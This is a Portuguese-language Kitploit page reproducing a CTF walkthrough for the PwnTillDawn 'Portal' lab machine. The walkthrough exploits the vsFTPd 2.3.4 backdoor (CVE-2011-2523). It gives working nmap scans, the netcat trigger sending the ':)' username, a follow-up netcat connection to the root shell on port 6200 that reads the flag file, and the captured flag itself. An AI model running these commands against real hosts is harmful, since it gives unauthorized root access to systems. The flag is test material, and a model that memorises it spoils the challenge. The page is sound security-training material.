Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
PwnTillDawn-Portal-Walkthrough — Um passo a passo detalhado de testes de penetração e um relatório de exploração para a máquina 'Portal', com foco no CVE-2011-2523 (backdoor do vsFTPd 2.3.4) para obter acesso root. | Kitploit
Ferramentas/GitHubGitHub/tr00jan99/pwntilldawn-portal-walkthrough
Escalada de PrivilégiosReconhecimentoAnálise de VulnerabilidadesExploraçãoPós-ExploraçãoCTFTestes de PenetraçãoAprendizado e Educação

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
GitHub
tr00jan99/pwntilldawn-portal-walkthrough

PwnTillDawn-Portal-Walkthrough

Um passo a passo detalhado de testes de penetração e um relatório de exploração para a máquina 'Portal', com foco no CVE-2011-2523 (backdoor do vsFTPd 2.3.4) para obter acesso root.

Ver Repositório
2há 5 mesesAinda não revisado

🔐 Avaliação de Vulnerabilidades e Testes de Penetração (VAPT)

📌 Projeto: Passo a Passo da Exploração do Alvo

⚠️ Este projeto é apenas para fins educacionais e de testes autorizados.
O acesso não autorizado a sistemas é estritamente proibido.


👨‍💻 Autor

SYAFIQ
Função: Líder de Testes de Penetração


🎯 Informações do Alvo

  • IP do Alvo: 10.150.150.12
  • Sistema Operacional: Ubuntu Linux
  • Status: 🔴 CRÍTICO (Backdoor Detectado)
  • Vulnerabilidade: CVE-2011-2523 (Backdoor do vsFTPd)

🧭 Visão Geral do Ataque

FaseFerramentaDescrição
DescobertaNmapVarre a rede por hosts ativos
EnumeraçãoNmapIdentifica serviços e versões
AnáliseScript NSEDetecta vulnerabilidade conhecida
ExploraçãoNetcatAciona a backdoor
Pós-ExploraçãoTerminalObtém acesso root e recupera a flag

🚀 Passo a Passo

🔍 Passo 1: Reconhecimento de Rede

Escaneie a rede em busca de hosts ativos:

root@kitploit:~
nmap -sn --unprivileged 10.150.150.10-30

✅ Resultado:

-8 hosts detectados -Alvo identificado: 10.150.150.12

🔎 Passo 2: Enumeração de Serviços

Escaneie portas e serviços abertos:

root@kitploit:~
nmap -Pn -F --unprivileged -sV 10.150.150.12

✅ Descobertas:

-Porta 21 → FTP (vsftpd) -Porta 22 → SSH (OpenSSH 8.2p1)

⚠️ Passo 3: Escaneamento de Vulnerabilidades

Verifique se há vulnerabilidade conhecida de backdoor no FTP:

root@kitploit:~
nmap -Pn --unprivileged -p21 --script ftp-vsftpd-backdoor 10.150.150.12

🚨 Resultado:

-Alvo VULNERÁVEL -CVE-2011-2523 confirmada

💣 Passo 4: Exploração

Acione a backdoor usando um nome de usuário malicioso:

root@kitploit:~
(echo "USER hello:)"; echo "PASS password"; sleep 1) | nc -nv 10.150.150.12 21

⚡ Isso abre um shell root oculto na porta 6200

🔓 Passo 5: Obter Acesso (Shell Root)

Conecte-se à backdoor e execute comandos:

root@kitploit:~
(echo "id; cat /root/FLAG1.txt"; sleep 1) | nc -nv 10.150.150.12 6200

✅ Resultado:

Acesso root obtido uid=0(root) confirmado

🏁 Flag Capturada:

root@kitploit:~
5ee499eb5d0b8e4269b13483e57adaa0b3815f48

🧠 Principais Lições

Sempre atualize serviços desatualizados (vsFTPd estava vulnerável) Serviços mal configurados podem levar ao comprometimento total do sistema Varreduras simples podem revelar vulnerabilidades críticas -🛡️ Recomendações -🔄 Atualize o serviço FTP para a versão mais recente -🚫 Desative serviços desnecessários -🔐 Use firewall para restringir o acesso -📊 Realize auditorias de segurança regularmente -📚 Aviso Legal

Este projeto foi criado estritamente para:

Aprender segurança cibernética Praticar hacking ético Realizar testes de penetração autorizados

❌ NÃO use esse conhecimento para atividades ilegais.

⭐ Nota Final

“Segurança não é um produto, mas um processo.” — Sempre teste, monitore e melhore.

Baixar ferramenta